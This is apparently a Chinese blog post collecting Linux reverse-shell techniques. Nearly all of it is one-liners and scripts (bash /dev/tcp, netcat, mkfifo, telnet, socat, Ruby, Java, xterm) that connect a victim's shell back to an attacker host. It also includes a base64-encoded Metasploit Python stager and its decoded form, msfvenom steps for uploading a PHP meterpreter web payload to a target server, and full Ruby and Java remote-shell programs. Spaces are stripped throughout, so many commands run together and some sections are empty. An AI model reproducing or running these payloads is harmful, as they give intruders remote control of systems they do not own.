linux反弹shell
2016-10-09 10:11
579 查看
参考链接
http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.htmlhttp://www.waitalone.cn/linux-shell-rebound-under-way.htmlhttp://roo7break.co.uk/?p=215 http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://www.91ri.org/9367.html http://www.tuicool.com/articles/3uQ3ue
拓展阅读
linux设置启动执行命令:http://www.cnblogs.com/ssooking/p/6094740.html
反弹IP:10.0.0.1
监听端口:1234
Bash
[shell有时由bash解析有时由sh解析,不一定百发百中]注:/dev/[tcp|upd]/host/port是Linux设备里面的特殊文件,读取或写入相当于建立socket调用
"&"在Linuxshell中表示后台运行
但这里0>&1不是这样,对于&1更准确的说应该是文件描述符1。而1一般代表的就是STDOUT_FILENO***
2>&1形式用于重定向,2>表示错误重定向,&1表示标准输出;
以ls>/dev/null2>&1为例:2>&1是将标准出错重定向到标准输出,在这里又被重定向到了/dev/null里
补充:
Netcat
不同版本的nc不一定支持-e选项nc-ecmd.exe10.0.0.11234
nc-e/bin/sh10.0.0.11234
nc不使用-e Hacker:nc-lvnp1234 Victim:mknod/tmp/backpipep Victim:/bin/sh0</tmp/backpipe|nc10.0.0.112341>/tmp/backpipe 不使用nc Method1: Hacker:nc-nvlpp1234 Victim:/bin/bash-i>/dev/tcp/10.0.0.1/12340<&12>&1 Method2: Hacker:nc-nvlpp1234 Victim:mknodbackpipep&&telnet10.0.0.112340backpipe Method3: Hacker:nc-nvlpp8080 Hacker:nc-nvlpp8888 Victim:telnet10.0.0.11234|/bin/bash|telnet10.0.0.11234 Method4: rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.0.0.11234>/tmp/f Method5: nc10.0.0.11234|/bin/sh|ncx.x.x.x2444
socat
socattcp-connect:转发到某个主机的IP:端口exec:'bash-li',pty,stderr,setsid,sigint,sanesocat是个非常强大的工具,跑个题,补充几个用法
PERL
Python
Metasploit版的python代码:
#msfvenom-fraw-ppython/meterpreter/reverse_tcpLHOST=192.168.90.1LPORT=1234 importbase64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
base64解码后:
importsocket,struct s=socket.socket(2,1) s.connect(('192.168.90.1',1234)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(4096) whilelen(d)!=l: d+=s.recv(4096) exec(d,{'s':s})
PHP
Ruby
不依赖于/bin/sh:ruby-rsocket-e'exitiffork;c=TCPSocket.new("10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'
目标是windows:ruby-rsocket-e'c=TCPSocket.new(10.0.0.1","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.printio.read}end'
Java
p=r.exec(["/bin/bash","-c","exec5<>/dev/tcp/10.0.0.1/1234;cat<&5|whilereadline;do\$line2>&5>&5;done"]asString[])
p.waitFor()
msf:usepayload/java/shell/reverse_tcp
Telnet
或者
mknodbackpipep&&telnet10.0.0.112340<backpipe|/bin/bash1>backpipe
lua
msf反弹:usepayload/cmd/unix/reverse_lua
Xterm
首先开启Xserver: #TCP6001
Xnest:1 #Note:ThecommandstartswithuppercaseX
授予目标机连回来的权限:
xterm-display127.0.0.1:1#RunthisOUTSIDEtheXnest,anothertab
xhost+targetip#RunthisINSIDEthespawnedxtermontheopenXServer
如果想让任何人都连上:
xhost+ #RunthisINSIDEthespawnedxtermontheopenXServer
假设xterm已安装,连回你的Xserver:
xterm-displayattackerip:1 或者:$DISPLAY=attackerip:0xterm
msfvenom生成web反弹shell
msfvenom-pphp/meterpreter/reverse_tcpLHOST=192.168.1.2LPORT=1234-fraw>test.php
生成后要将脚本最前面的注释符去掉,然后上传到目标服务器上
启动msf
setPAYLOADphp/meterpreter/reverse_tcp
setLHOSTIP
setLPORTport
exploit-j
然后从浏览器中访问上传的脚本http://xxx.com/test.php,即可获得shell
#反弹sshshell
一些msf模块里面的长脚本
Ruby
require'socket'
require'open3'
#SettheRemoteHostIP
RHOST="192.168.1.10"
#SettheRemoteHostPort
PORT="6667"
#Triestoconnectevery20secuntilitconnects.
begin
sock=TCPSocket.new"#{RHOST}","#{PORT}"
sock.puts"Weareconnected!"
rescue
sleep20
retry
end
#Runsthecommandsyoutypeandsendsyoubackthestdoutandstderr.
begin
whileline=sock.gets
Open3.popen2e("#{line}")do|stdin,stdout_and_stderr|
IO.copy_stream(stdout_and_stderr,sock)
end
end
rescue
retry
end
JAVA
importjava.net.Socket;
importjava.util.*;
importjava.util.regex.*;
importjava.applet.Applet;
publicclasspocextendsApplet{
/**
*Author:danielbaieraliasduddits
*Licens:GPL
*Requirements:JRE1.5forrunningandtheJDK1.5forcompilingorhigher
*Version:0.1alpharelease
*/
publicStringcd(Stringstart,FilecurrentDir){
FilefullPath=newFile(currentDir.getAbsolutePath());
Stringsparent=fullPath.getAbsoluteFile().toString();
returnsparent+"/"+start;
}
@SuppressWarnings("unchecked")
publicvoidinit(){
pocrs=newpoc();
PrintWriterout;
try{
SocketclientSocket=newSocket("192.168.5.222",10003);
out=newPrintWriter(clientSocket.getOutputStream(),true);
out.println("\tJRS0.1alpharelease\n\tdevelopedbydudditsaliasdanielbaier");
booleanrun=true;
Strings;
BufferedReaderbr=newBufferedReader(newInputStreamReader(clientSocket.getInputStream()));
Stringstartort="/";
while(run){
Stringz1;
Filef=newFile(startort);
out.println(f.getAbsolutePath()+">");
s=br.readLine();
z1=s;
Patternpcd=Pattern.compile("^cd\\s");
Matchermcd=pcd.matcher(z1);
String[]teile1=pcd.split(z1);
if(s.equals("exit")){
run=false;
}elseif(s.equals(null)||s.equals("cmd")||s.equals("")){
}elseif(mcd.find()){
try{
Stringcds=rs.cd(teile1[1],newFile(startort));
startort=cds;
}catch(Exceptionverz){
out.println("Path"+teile1[1]
+"notfound.");
}
}else{
Stringz2;
z2=s;
Patternpstring=Pattern.compile("\\s");
String[]plist=pstring.split(z2);
try{
LinkedListslist=newLinkedList();
for(inti=0;i<plist.length;i++){
slist.add(plist[i]);
}
ProcessBuilderbuilder=newProcessBuilder(slist);
builder.directory(newFile(startort));
Processp=builder.start();
Scannerse=newScanner(p.getInputStream());
if(!se.hasNext()){
Scannersa=newScanner(p.getErrorStream());
while(sa.hasNext()){
out.println(sa.nextLine());
}
}
while(se.hasNext()){
out.println(se.nextLine());
}
}catch(Exceptionerr){
out.println(f.getAbsolutePath()+">Command"
+s+"failed!");
out.println(f.getAbsolutePath()+">Pleasetrycmd/c"+s+"orbash-c"+s+"ifthiscommandisanshellbuildin.");
}
}
}
if(!clientSocket.isConnected()){
run=false;
out.flush();
out.close();
}
}catch(Exceptionio){
//System.err.println("Connectionrefusedbypeer");
}
}
}
相关文章推荐
- 辨别Linux下的>,>>,>&与&>以及反弹shell语句的理解
- linux下反弹shell的几种方法
- Linux下反弹shell方法
- Linux下通过WebShell反弹Shell的技巧
- Linux下反弹shell方法
- Linux下反弹shell的三种方法
- 当Linux提权不能反弹Shell时利用metasploit进行提权
- Linux反弹shell
- Linux渗透之反弹Shell命令解析
- Linux下反弹shell的种种方式
- linux下反弹shell的姿势
- Linux下通过WebShell反弹Shell的技巧(转;http://www.huachu.com.cn/news/newsinfo.asp?specialNewsID=1000001589)
- Linux***之反弹Shell命令解析
- Linux 一句话反弹shell
- Linux下shell反弹
- Linux下通过WebShell反弹Shell的技巧
- Linux下通过WebShell反弹Shell的技巧
- Linux下NC反弹shell命令(推荐)
- Linux shell mail add attachment(Linux用shell发邮件带附件)
- Linux手机DIY.Shell应用扩展二.自动生成播放列表(E680系列)